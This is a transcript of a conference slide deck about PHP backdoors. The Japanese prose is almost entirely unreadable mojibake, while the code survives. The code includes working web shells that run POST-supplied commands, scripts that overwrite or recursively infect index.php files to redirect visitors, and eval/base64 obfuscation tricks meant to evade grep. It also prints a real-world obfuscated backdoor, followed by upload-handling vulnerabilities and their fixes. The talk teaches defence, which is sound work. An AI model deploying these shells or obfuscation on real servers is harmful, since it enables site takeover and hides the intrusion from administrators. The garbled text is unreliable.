作って理解するバックドア

Transcript

1. ࡞ͬͯཧղ͢ΔόοΫυΞ -FU`T
   %*:

2. ࣗݾ঺հ w גࣜձࣾ"%
   ୅ද
   w ొ࿥
   த
   ηΩεϖʢʙʣ
   w 1)1FS,BJHJ
   
   ొஃ 


   ʮຊ౰ʹ͋ͬͨා͍੬ऑੑͷ࿩ʯ 3PLV
   !BEKQ

3. ຊ౰͸๻΋ΞʔΩςΫνϟ࿦ͱ͔
   ϢχοτςετΈ͍ͨͳ
   ΩϥΩϥͨ͠࿩͕͍͚ͨ͠ΕͲɺ
   ಙ̋͞Μͷޙ佂తϙδγϣϯΛૂͬͯɺ
   ࠓճ΋ηΩϡϦςΟωλͰ͢ɻ

4. ೥΄Ͳલͷ͓࿩ w ,͞Μʮ3PLV͞ʔΜʂIUBDDFTT
   ͕ফͤͳ͍ΜͰ͢ʢٽʣʯ
   w ๻ʮʢ͋͋ɺύʔϛογϣϯ͔ͳʁʣͲ͜ͷαΠτͰ͔͢ʁʯ
   w ,͞ΜʮʓʓͰ͢ɻαΠτશମ͕ݟ͑ͳ͘ͳͬͯͯʢٽʣʯ
   w ๻ʮʢϙνϙνʣɾɾɾ͋Εʁফͤ·ͨ͠Αʯ
   w

   ,͞ΜʮԿ౓ফͯ͠΋਺෼͓͖ʹ෮׆͢ΔΜͰ͢ʢྦʣʯ

5. ͦΕɺόοΫυΞͰ͢ɻ

6. ࠓճͷ಺༰ w όοΫυΞͷ֓ཁ
   w όοΫυΞͷ࡞Γํͱ࣮ྫ
   w όοΫυΞͷରࡦ

7. όοΫυΞͷ֓ཁ

8. ࣮ԋ w ͋Δͱ͜ΖʹɺԿͷม఩΋ͳ͍ϝʔϧϑΥʔϜ͕͋Γ·ͨ͠ɻ

9. ࣮ԋ w ѱ͍ਓ͕ϑΝΠϧ͕͜ΜͳϑΝΠϧΛΞοϓϩʔυ͠·ͨ͠ɻ 
 
 SFXSJUFJOEFYQIQ <?php $path = __DIR__

   . '/../../../public/index.php'; $code = "<?php die('you have been hacked :)');"; file_put_contents($path, $code); die('success');

10. ࣮ԋ w ͦͯ͠ɺϑΝΠϧͷϓϨϏϡʔϦϯΫΛΫϦοΫ͠·ͨ͠ɻ

11. ࣮ԋ w ͦͯ͠ɺϑΝΠϧͷϓϨϏϡʔϦϯΫΛΫϦοΫ͠·ͨ͠ɻ

12. ࣮ԋ w αΠτશମ͕͜͏ͳΓ·ͨ͠ɻ

13. ߈ܸ༻ϑΝΠϧ͍Ζ͍Ζ w ΋ͬͱλνѱ͍΍ͭɻ <?php $path = __DIR__ . '/../../../public/index.php'; $code

    = "<?php header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');

14. ߈ܸ༻ϑΝΠϧ͍Ζ͍Ζ w యܕతʹ͸͜Εɻ <?php file_put_contents($_POST['path'], $_POST['code']); <?php exec($_POST['command']);

15. ͜ΜͳϑΝΠϧΛΞοϓϩʔυ͞ΕͨΒ w ΋͸΍ୈࡾऀ͕αʔόΛࣗ༝ʹૢ࡞Ͱ͖Δͷͱಉ͡ 
 ʹαʔόͷཪޱʢόοΫυΞʣ

16. ߈ܸͷྲྀΕ

17. ߈ܸͷྲྀΕ

18. ߈ܸͷྲྀΕ

19. ߈ܸͷྲྀΕ

20. ߈ܸͷྲྀΕ

21. ߈ܸͷྲྀΕʢ·ͱΊʣ w ࠷ॳͷ߈ܸ༻ϑΝΠϧ͕ɺ੬ऑੑΛ௨ͯ͡αʔόʹஔ͔ΕΔ 
 ˣ
    w ओ໨తͰ͋Δվ͟ΜΛߦ͍ͭͭɺ 
 ୈ̎ɼୈ̏ͷ߈ܸ༻ϑΝΠϧΛผͷ৔ॴʹஔ͘ɻ 


    ˣ
    w ࠷ॳͷ߈ܸ༻ϑΝΠϧ͕ۦআ͞Εͯ΋ɺୈ̎ɺୈ̏ͷ 
 ߈ܸ༻ϑΝΠϧʹΑΓɺվ͟ΜΛ܁Γฦ͢ɻ

22. ͭ·ΓόοΫυΞ͸ w੬ऑੑͦͷ΋ͷͰ͸ͳ͘ɺ 
 ߈ܸ໨తͦͷ΋ͷͰ΋ͳ͍ɻ
    wҰ౓੒ޭͨ͠߈ܸΛܧଓతʹߦ͍΍͘͢ɺ 
 ·ͨۦআ͠ʹ͘͘͢ΔͨΊͷதؒखஈɻ

23. ࠜຊݪҼͱͳΔ੬ऑੑ w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ 
 ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ 
 ʢ$8&ʣ
    w

    ͳͲɻ

24. ߈ܸͷओ໨త ΤϯτϦʔϙΠϯτ
    JOEFYQIQ
    ΍
    IUBDDFTT
    Λվ͟Μ͠ɺ
    w ϢʔβΛ߈ܸऀͷαΠτʹඈ͹͢ɻ
    w ةݥͳϑΝΠϧΛμ΢ϯϩʔυͤ͞Δɻ
    w %%P4߈ܸ౳ͷ౿Έ୆ʹ͢Δɻ
    

    w FOW౳ͷ৘ใΛൈ͖औΔɻ
    w ηογϣϯ౳͔ΒϢʔβͷൿີ৘ใΛൈ͖औΔɻ

25. όοΫυΞͷ࡞Γํ

26. ͖ͬ͞ͷαϯϓϧ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');

27. ͖ͬ͞ͷαϯϓϧ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success'); ͜Μͳվ͟ΜͳΒ·ͩϚγɻ

28. άϨʔυΞοϓ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

    { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code);

29. άϨʔυΞοϓ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

    { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code); ؅ཧऀ΍։ൃऀ͕ؾ͔ͮͳ͍͏ͪʹɺ
    ৽ن๚໰ऀ͚͕ͩඈ͹͞Εଓ͚Δɻ

30. ͜ΜͳύεܾΊଧͪͷ߈ܸ
    ౰ͨΔΘ͚ͶʔͩΖ͆͆͆

31. HMPC
    Λ࢖ͬͯ૯౰ͨΓ <?php function prepend($path) { $code .= file_get_contents($path, “…߈ܸ༻ίʔυ…”);

    file_put_contents($path, $code); } function prependRecursive($path) { if (file_exists("{$path}/index.php")) { prepend("{$path}/index.php"); } foreach (glob("{$path}/*") as $child) { if (is_dir($child)) { prependRecursive($child); } } } prependRecursive($_SERVER["DOCUMENT_ROOT"]);

32. ൃݟ͞Εʹ͍͘ϑΝΠϧΛૂ͏ w ϑϨʔϜϫʔΫʹඞͣଘࡏ͢ΔϑΝΠϧΛվ͟Μ 
 ྫʣQVCMJDJOEFYQIQ
    w ϑϨʔϜϫʔΫʹ͍͔ʹ΋͋Γͦ͏ͳ໊લͷϑΝΠϧΛઃஔ 
 ྫʣMPBEQIQ 


    
    
    
    
    
    
    MPDBMFQIQ
    w HJUJHOPSF͞Ε͍ͯΔσΟϨΫτϦʹϑΝΠϧΛઃஔ 
 ྫʣTUPSBHFQVCMJD

33. 8PSE1SFTTͳΒɾɾɾ w XQBENJO
    ΍
    XQJODMVEFT
    ಺ͷϑΝΠϧΛվ͟Μɺ 
 ·ͨ͸ϑΝΠϧΛઃஔ
    w XQDPOUFOUQMVHJOTYYY
    ಺ͷϑΝΠϧΛվ͟Μɺ 
 ·ͨ͸ϑΝΠϧΛઃஔ
    w

    XQDPOUFOUVQMPBET
    ಺ʹϑΝΠϧΛઃஔ

34. GJMF@QVU@DPOUFOU
    ͱ͔
    GXSJUF
    ͱ͔Ͱ
    HSFQ
    ͨ͠Β
    ۦআͰ͖ΔΜ͡ΌͶʁ

35. ྫ͑͹͜ͷίʔυ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code);

36. ͜͏ͯ͠ <?php eval("$path = __DIR__ . '/../../../public/index.php'; $code = \"<?php

    header('Location: https://ad5.jp'); \";file_put_contents($path, $code)");

37. ͜͏͢Δͱ <?php eval(base64_decode("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8 uLi9wdWJsaWMvaW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZG VyKCdMb2NhdGlvbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1d F9jb250ZW50cygkcGF0aCwgJGNvZGUp"));

38. GJMF@QVU@DPOUFOU
    ফ͑·ͨ͠ɻ

39. ͡Ό͋ɺFWBM
    ͱ͔
    CBTF@EFDPEF
    Ͱ΋
    HSFQ
    ͢Ε͹͍͍Μ͡ΌͶʁ

40. 1)1͞Μ͸ॊೈͳΜͰ͢ɻ <?php $a = "eval"; $b = “base64_encode"; $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl

    vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy gkcGF0aCwgJGNvZGUp"));

41. 1)1͞Μ͸ॊೈͳΜͰ͢ɻ <?php $x = '0123456789abcdefghijklmnopqrstuvwxyz_'; $a = $x[14].$x[31].$x[10].$x[21]; $b =

    $x[11].$x[10].$x[28].$x[14].$x[6].$x[4].$x[36]. $x[13].$x[14].$x[12].$x[24].$x[13].$x[14]; $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy gkcGF0aCwgJGNvZGUp"));

42. ίʔυ͔ΒҰ੾ͷ
    ؔ਺͕ফ͑·ͨ͠

43. HSFQ
    ແཧͰ͢ɻ

44. ˞͓அΓ w ઌఔͷίʔυ͸̍఺ӕ͕͋Γ·͢ɻ 
 FWBM
    ͸ؔ਺Ͱ͸ͳ͘ݴޠߏ଄ͷͨΊɺ 
 
 
 ͸ಈ͖·ͤΜɻ
    w

    ࣮ࡍͷஈ໨ͷ೉ಡԽʹ͸ɺ 
 DSFBUF@GVODUJPO
    ؔ਺
    1)1
    
    
    ͕࢖ΘΕ͍ͯΔ΋ͷ͕ 
 ଟ͘ݟΒΕ·ͨ͠ɻ $a = "eval"; $a();

45. ࣮ࡍʹ࠾ूͨ͠όοΫυΞ
    MPDBMFQIQ ˞໿
     
    CZUF <?php $tJvyYsXGpmgwi='y(3;]whcx)8$4mb dk1qog5sprlua=z_/ 0i9tvf_”76*.2n[je';$q2866=$tJvyYsXGpmgwi[(105/15)]. $tJvyYsXGpmgwi[(26-1)].$tJvyYsXGpmgwi[(1*49)]. $tJvyYsXGpmgwi[((10*1)+18)].$tJvyYsXGpmgwi[(14+22)].

    $tJvyYsXGpmgwi[(44+5)].$tJvyYsXGpmgwi[(44-13)].$tJvyYsXGpmgwi[(684/18)]. $tJvyYsXGpmgwi[(23+4)].$tJvyYsXGpmgwi[(72-(33-7))]. $tJvyYsXGpmgwi[(154/22)].$tJvyYsXGpmgwi[(11+25)].$tJvyYsXGpmgwi[(65- (62-31))].$tJvyYsXGpmgwi[(26-6)].$tJvyYsXGpmgwi[((27*2)-8)]; $pHFdNhg9688=$tJvyYsXGpmgwi[(20-9)].$tJvyYsXGpmgwi[(2*4)]. $tJvyYsXGpmgwi[(29*1)].$tJvyYsXGpmgwi[(160/4)]; $MYtraky2482=$tJvyYsXGpmgwi[(8*5)].$tJvyYsXGpmgwi[((1+0)+2)]. $tJvyYsXGpmgwi[(6+(1*(95/19)))].$tJvyYsXGpmgwi[(140/5)]. $tJvyYsXGpmgwi[(522/18)].$tJvyYsXGpmgwi[(7*((7-3)-2))]. …ུ…

46. ղಡ͢Δͱ͜͏ͳͬͯͨɻ <?php $x=“‘7RxrU9tI8jP8CqGiIvtWyCYJSRYwgSTO4y4BziZ3l98Q…ུ…“; $a=base64_decode($x); $b=gzinflate($a); eval($b);

47. EFDPEF
    ͢Δͱɻ <?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss.xml'; $dt =

    0; $sitemap_file = 'sitemap'; $mapnum = 2000; if(isset($_GET['dt'])){ $dt = $_GET['dt']; } $site = @$_GET['smsite']; $jdir = ''; $http_web = 'http'; if(is_https()){ $http = 'https'; }else{ …ུ…

48. MPDBMFQIQ
    ͷಛ௃ w (PPHMF
    ʹِͷαΠτϚοϓ౳Λૹ͍ͬͯΔɻ 
 ˠ
    4FBSDI
    $POTPMF
    ΍ݕࡧ݁ՌͷΞϥʔτʹΑΓɺ 
 ɹ
    ӡӦऀ΍Ϣʔβʹؾ͔ͮΕΔͷΛ๷͙ͨΊɻ
    w $44΍ը૾౳ͷೖͬͨσΟϨΫτϦΛૂ͍ͬͯΔɻ
    w

    ϑΝΠϧʹॻ͖ࠐΉ಺༰Λ֎෦63-͔Βऔಘ͍ͯ͠Δɻ 
 ˠ
    ͓ͦΒ͘߈ܸऀͷ࢘ྩ༻αʔόɻ͜ͷ಺༰Λมߋ͢Δ͜ͱͰ 
 ɹ
    ߈ܸ༻ϑΝΠϧΛมߋͤͣͱ΋ɺ߈ܸ಺༰Λม͑ΒΕΔɻ

49. શจ͓Αͼଞͷαϯϓϧ͸ͪ͜Β͔ΒͲ͏ͧ HJUIVCDPNBEKQQIQFSLBJHJ

50. όοΫυΞͷରࡦ

51. ઃஔ͞Εͳ͍Α͏ʹ͢Δɻ

52. Ҏ্ɻ

53. ࠜຊݪҼͱͳΔ੬ऑੑ w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ 
 ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ 
 ʢ$8&ʣ
    w

    ͳͲɻ

54. ࠜຊݪҼͱͳΔ੬ऑੑ w ةݥͳλΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυ 
 ʢ$8&ʣ
    w 04ίϚϯυΠϯδΣΫγϣϯ 
 ʢ$8&ʣ
    w

    ͳͲɻ ࠓ೔͸͜Εʹߜ͓ͬͯ࿩͠·͢ɻ

55. ࣮ԋʹ࢖༻͓ͨ͠໰͍߹ΘͤϑΥʔϜ public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

    $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); chmod($saving_path, 0755); $data['file_name'] = $_FILES['file']['name']; $data['file_url'] = url('storage/', $_FILES['file']['name']); session()->put('inquiry', $data); return redirect()->route('confirm'); }

56. ྲྀੴʹ͜Μͳ࣮૷͢Δਓ͸
    ͍ͳ͍ͱࢥ͍·͕͢ɾɾɾ

57. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }

58. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ } ݁࿦͔Βݴ͑͹ɺ΄ͱΜͲͷ৚݅ԼͰ͸ηʔϑͰ͢ɻ
    Կނηʔϑͳͷ͔ɺͲ͏͍͏৚݅ԼͰةݥͳͷ͔ɺ
    ౴͑ΒΕ·͔͢ʁ

59. ͳͥ͜Μͳ͜ͱΛ㘤͘ͷ͔ɻ w୭΋ɺ੬ऑੑΛ࡞Ζ͏ͱࢥͬͯ࡞͍ͬͯͳ͍ɻ
    w࣮ࡍͷϓϩμΫτͷ࢓༷͸ෳࡶͰɺ 
 ίʔυ΋ෳࡶʹೖΓ૊ΜͰ͍Δɻ 
 ͦͷ݁Ռɺ໰୊͕ൃੜ͢Δ৚͕݅ͨ·ͨ·ἧͬͯ͠·͍ɺ 
 ੬ऑੑ͕ੜ·Εͯ͠·͏ɻ
    wਖ਼֬ͳཧղ͕ॏཁɻ

60. ߈ܸͷ੒ཱ৚݅ ᶃ1)1౳ͷεΫϦϓτϑΝΠϧ͕ΞοϓϩʔυͰ͖ͯ͠·͏ɻ
    ᶄΞοϓϩʔυઌ͕ಉҰαʔό಺ͷެ։σΟϨΫτϦͰ͋Δɻ
    ᶅΞοϓϩʔυ͞ΕͨϑΝΠϧ͕࣮ߦՄೳͰ͋Δɻ

61. ੒ཱ৚݅ͱରࡦ ᶃ1)1౳ͷεΫϦϓτϑΝΠϧ͕ΞοϓϩʔυͰ͖ͯ͠·͏ɻ
    ˠ
    .JNF5ZQF
    ΛνΣοΫ͠ɺඞཁ࠷খݶͷछྨͷϑΝΠϧͷ 
 ɹ
    ΞοϓϩʔυͷΈڐՄ͢Δɻ
    ɾɾɾཁ݅ʹΑͬͯ͸
    .JNF5ZQF
    ͷ੍ݶ͕ࠔ೉ͳ৔߹΋͋Δɻ

62. ੒ཱ৚݅ͱରࡦ ᶄΞοϓϩʔυઌ͕ಉҰαʔό಺ͷެ։σΟϨΫτϦͰ͋Δɻ
    ˠ
    ΞοϓϩʔυϑΝΠϧΛඇެ։σΟϨΫτϦʹஔ͍ͯ 
 ɹ
    ͍Ε͹ɺ߈ܸʹ࢖༻͞ΕΔ͜ͱ͸ͳ͍ɻ 
 ɹ
    ·ͨɺΞϓϦέʔγϣϯͷઃஔ͞Εͨ8FCαʔόͱผͷ 
 ɹ
    ৔ॴʹϑΝΠϧΛஔ͍͍ͯΕ͹ɺ߈ܸ͸੒ཱ͠ͳ͍ɻ
    


    ɾɾɾ͜Ε΋ཁ݅࣍ୈͰ࣮ݱͰ͖ͳ͍৔߹΋ɻ 
 ɹɹɹͦ΋ͦ΋ຊ࣭తରࡦͰ͸ͳ͍ɻ

63. ੒ཱ৚݅ͱରࡦ ᶅΞοϓϩʔυ͞ΕͨϑΝΠϧ͕࣮ߦՄೳͰ͋Δɻ
    ΑΓ۩ମతʹ͸ɺҎԼͷ̎৚݅ɻ
    "
    1)1΍$(*ͱͯ͠ղऍ͞ΕΔʢ࣮ߦ༻ͷϋϯυϥʹ 
 ɹ
    Ϛοϓ͞Ε͍ͯΔʣϑΝΠϧ໊Ͱอଘ͞ΕΔɻ
    #
    ࣮ߦՄೳͳύʔϛογϣϯͰอଘ͞ΕΔɻ

64. ੒ཱ৚݅ͱରࡦ ᶅ"
    1)1΍$(*ͱͯ͠ղऍ͞ΕΔϑΝΠϧ໊Ͱอଘ͞ΕΔɻ
    Ұൠతʹɺ֦ுࢠ͕
    QIQ
    Ͱͳ͚Ε͹ɺ1)1ͱ࣮ͯ͠ߦ͞ΕΔ 
 ͜ͱ͸ͳ͍ɻ 
 ʢ1)1ίʔυ͕ॻ͔Ε͍ͯͯ΋ɺ୯ͳΔςΩετϑΝΠϧ 
 ɹͱͯ͠ѻΘΕΕ͹ແ֐ʣ
    ˞ୠ͠ɺ্ه͸8FCαʔόͷઃఆʹґଘ͢Δʢޙड़ʣɻ

65. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }

66. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ } σϑΥϧτͰ͸ɺQIQ
    ϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ
    ֦ுࢠͳ͠ʹͳΔɻ

67. 6QMPBEFE'JMFTUPSF
    ͷ࣮૷ 6QMPBEFE'JMFIBTI/BNF
    ʹΑΓϑΝΠϧ໊͕ܾఆ͞ΕΔɻ 
 ֦ுࢠ͸ɺ'JMFHVFTT&YUFOUJPO
    ʹΑܾͬͯΊΒΕΔɻ 
 1)1ϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ.JNF5ZQF͸ 


    UFYUYQIQ
    ͱͳΓɺ.JNF5ZQF."1
    ͷఆٛʹै͍ɺ 
 ֦ுࢠͳ͠Ͱ֨ೲ͞ΕΔɻ
    
    6QMPBEFE'JMF
    ʜ
    *MMVNJOBUFa)UUQa6QMPBEFE'JMF 

    'JMF
    ʜ
    4ZNGPOZa$PNQPOFOUa)UUQ'PVOEBUJPOa'JMFa'JMF 

    .JNF5ZQFT
    ʜ
    4ZNGPOZa$PNQPOFOUa.JNFa.JNF5ZQFT

68. ྫ֎ ͨͩ͠ɺ͜ͷڍಈ͸ɺ.JNF5ZQFEFGBVMU
    Ληοτ͢Δ͜ͱ ͰมߋՄೳͰ͋Δɻ 
 ੩తϓϩύςΟͰ͋ΔͨΊɺྫ͑͹
    4FSWJDF1SPWJEFS
    ౳Ͱ 
 ηοτ͍ͯ͠Ε͹ɺΞϓϦέʔγϣϯશମʹӨڹ͕ٴͿɻ
    
    .JNF5ZQFT
    ʜ
    4ZNGPOZa$PNQPOFOUa.JNFa.JNF5ZQFT

69. ͜Μͳ࣮૷΋ɺ΍Γ͕ͪɻ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $filename = Carbon::now()->format(‘Ymd_His.') . $uploaded_file->getClientOriginalExtension(); $path = $uploaded_file->storePubliclyAs('upload', $filename , ['disk' => 'public']); //ུ } ϑΝΠϧ໊ʹ೔෇΍*%౳ͷϧʔϧΛ࣋ͨͤͯอଘ͢Δ৔߹ɻ
    HFU$MJFOU0SJHJOBM&YUFOTJPO
    ΑΓ
    HVFTT&YUFOUJPO

70. ͦ΋ͦ΋ ྫ͑͹
    "QBDIF
    ͷ৔߹ɺIUUQEDPOG
    ΍
    IUBDDFTT
    ʹ
    ͷΑ͏ʹهड़͞Ε͍ͯΕ͹ɺ֦ுࢠ
    IUNM
    Ͱ΋Ξ΢τɻ
    ཧ࿦্ɺઃఆ࣍ୈͰ͸ɺ͋ΒΏΔ໊લͷϑΝΠϧ͕1)1ͱͯ͠ 
 ࣮ߦՄೳͰ͋Δɻ
    8FCαʔόͷઃఆʹґଘ͢΂͖Ͱ͸ͳ͍ɻ AddHandler php-script .php

    .html

71. ੒ཱ৚݅ͱରࡦ ᶅ#
    ࣮ߦՄೳͳύʔϛογϣϯͰอଘ͞ΕΔɻ
    1)1ʹΑͬͯઃஔ͞ΕͨϑΝΠϧͷॴ༗ऀ͸ɺ௨ৗ1)1ͷ࣮ߦ ϢʔβͰ͋ΔͨΊɺॴ༗ऀͷ࣮ߦݖݶ͕͋Ε͹Ξ΢τɻ
    
    ˠ
    S
    X
    Y
    S
    X
    Y
    S
    X
    Y
    ˠ
    Ξ΢τ 
 
    ˠ
    S
    X
    
    S
    X
    
    S
    X
    
    ˠ
    ηʔϑ 
 
    ˠ
    S
    X
    Y
    S
    
    Y
    S
    
    Y
    ˠ
    Ξ΢τ 


    
    ˠ
    S
    X
    
    S
    
    
    S
    
    
    ˠ
    ηʔϑ 
 
    ˠ
    S
    X
    Y
    
    
    
    
    
    
    ˠ
    Ξ΢τ

72. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }

73. 6QMPBEFE'JMFTUPSF
    ͷ࣮૷ ιʔείʔυϦʔσΟϯά͸ׂѪ͠·͕͢ɾɾɾ
    ઃఆϑΝΠϧ
    DPO fi H fi MFTZTUFNTQIQ 
 ͷ
    EJTLTQVCMJDQFSNJTTJPOT
    ͷઃఆʹґଘ͠·͢ɻ
    

    σϑΥϧτͰ͸ɺσΟϨΫτϦ͸
    
    ·ͨ͸
    
    ʹɺ 
 ϑΝΠϧ
    ͸
    
    ·ͨ͸
    
    ʹͳ͍ͬͯ·͢ɻ
    ˠ
    ͜ͷઃఆΛมߋ͍ͯ͠ͳ͍ݶΓ͸ɺ 
 ɹ
    લड़ͷίʔυ͸ύʔϛογϣϯ
    
    ʹͳΓ·͢ɻ

74. ΋ͪΖΜɺ ࣗྗͰ
    DINPE QBUI
    
    ͱ͔ͯͨ͠ΒΞ΢τͰ͢ɻ
    TUPSBHF
    ϑΥϧμ͸ύʔϛογϣϯ
    
    ʹ͢΂͠ɺ 
 ͱ͍͏ޡͬͨղઆΛɺ͞ΒʹऔΓҧ͑ͯɺ 
 ϑΝΠϧอଘޙʹɺΘ͟Θ͟ύʔϛογϣϯ
    
    ʹ

    
 มߋ͍ͯ͠Δ࣮૷ɺݟͨ͜ͱ͋Γ·͢ɻɻɻ

75. ͪͳΈʹ͜ͷ৔߹ public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

    $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); //ུ } ύʔϛογϣϯ͸Ͳ͏ͳΔ͔ɺ౴͑ΒΕ·͔͢ʁ

76. GJMF@QVU@DPOUFOU
    ౳ͷύʔϛογϣϯ w 04ͷઃఆʢVNBTLʣʹґଘ͠·͢ɻ 
 ଟ͘ͷ؀ڥͰ͸ɺσΟϨΫτϦ͸
    
    ·ͨ͸ ɺ 
 ϑΝΠϧ͸
    
    

    ·ͨ͸
    Ͱ͢ɻ
    w 04ͷઃఆʹ΋ґଘ͢΂͖Ͱ͸ͳ͘ɺΞϓϦέʔγϣϯ಺Ͱ 
 ໌ࣔతʹରॲ͢΂͖Ͱ͢ɻ

77. ·ͱΊʢ$8&ͷରࡦʣ w ཁٻ࢓্༷ՄೳͳΒɺΞοϓϩʔυՄೳͳϑΝΠϧΛ 
 .JNF5ZQF
    Ͱඞཁ࠷খݶͷ΋ͷͷΈʹ੍ݶ͢Δɻ
    w ΞοϓϩʔυޙͷϑΝΠϧ͸࣮ߦෆՄೳͳύʔϛογϣϯʹɻ
    w ΞοϓϩʔυޙͷϑΝΠϧ͸࣮ߦෆՄೳͳϑΝΠϧ໊ʹɻ
    w

    -BSBWFM
    ͷ
    6QMPBEFE'JMFTUPSF
    Ͱ͑͞ɺ 
 ͍͔ͭ͘ͷ৚͕݅ॏͳΕ͹ةݥͳ࣮૷ʹͳΔɻ

78. αʔυύʔςΟ੡ϥΠϒϥϦ΋ཁ஫ҙ w +7/%# 
 8PSE1SFTT
    ༻
    DPOUBDUGPSN
    ϓϥάΠϯʹ͓͚Δةݥͳλ ΠϓͷϑΝΠϧͷແ੍ݶΞοϓϩʔυʹؔ͢Δ੬ऑੑ
    w +7/%# 
 .PWBCMF
    5ZQF
    ͷ
    9.-31$
    "1*
    ʹ͓͚Δ
    04
    ίϚϯυΠϯδ

    ΣΫγϣϯͷ੬ऑੑ
    ˠ
    ͲͪΒ΋ɺେྔͷόοΫυΞඃ֐Λൃੜͤ͞·ͨ͠ɻ

79. ͏ͪ͸
    8PSE1SFTT
    ࢖Θͳ͍͔Βେৎ෉ʁ

80. օ͞Μͷ͓٬༷ͷଟ͕͘ɺ w ڪΒ͘8PSE1SFTTΛ࢖༻͍ͯ͠·͢ɻ
    w ࣗࣾͷೲ඼෺΍อकର৅෺Ͱͳ͘ͱ΋ɺ 
 ͍͟ࠔͬͨΒօ͞Μʹ૬ஊ͕དྷΔ͸ͣͰ͢ɻ
    w ର؛ͷՐࣄͰ͸ͳ͘ɺ஫ҙשى͍͖ͯ͠·͠ΐ͏ɻ

81. ͦͯ͠ͳʹΑΓɺ w όοΫυΞͷଟ͕͘
    1)1
    Ͱॻ͔Ε͍ͯ·͢ɻ
    w1)1FS
    ͱͯ͠ɺ؃աͰ͖·ͤΜɻ

82. όοΫυΞΛઃஔ͞Εͯ 
 ͠·ͬͨΒ

83. جຊํ਑ w લड़ͷͱ͓Γɺ׬શۦআ͸ۃΊͯ೉͍͠Ͱ͢ɻ
    w ·ͣɺࠜຊݪҼͱͳΔ੬ऑੑΛಛఆ͠ɺഉআ͢Δɻ
    w ͦͷޙɺผͷαʔόΛཱͯɺ 
 "
    ߈ܸΛड͚ΔલͷόοΫΞοϓ͔ΒϦετΞ͢Δɻ 


    #
    ໨ࢹ֬ೝ͠ͳ͕Βɺ࣮֬ʹ҆શͳϑΝΠϧͷΈΛҠߦɻ

84. ௒ઈࠎ͕ંΕΔ্ɺ
    શ͘ੜ࢈ੑͷͳ͍࡞ۀͳͷͰɺ
    ࢮʹͨ͘ͳΓ·͢ɻ

85. ΍ΒΕ͔ͯΒͰ͸஗͍Ͱ͢ɻ

86. ฐ্࢙ࣾ൪࠷ѱͩͬͨόοΫυΞରԠ w ๭8FC੍࡞ձࣾ͞Μ͔Βٽ͖͔ͭΕͯɺରԠɻ
    w Ҏ্ͷαΠτ͕ɺϨϯαόͷϚϧνυϝΠϯͰ 
 ӡ༻͞Ε͓ͯΓɺಓ࿈Εඃ֐ɻ 
 ˠ
    ҕୗݩ͔ΒΫϨʔϜͷཛྷɻ 


    ˠ
    ݪҼಛఆࣗମ͕ۃΊͯ೉ߤɻ 
 ˠ
    ϦετΞ΋Ҡ؅΋ඇݱ࣮తɻ
    w ׬શղܾʹϲ݄ۙ͘Λཁͨ͠ɻ

87. ΋͏Ұ౓ݴ͍·͢ɻ
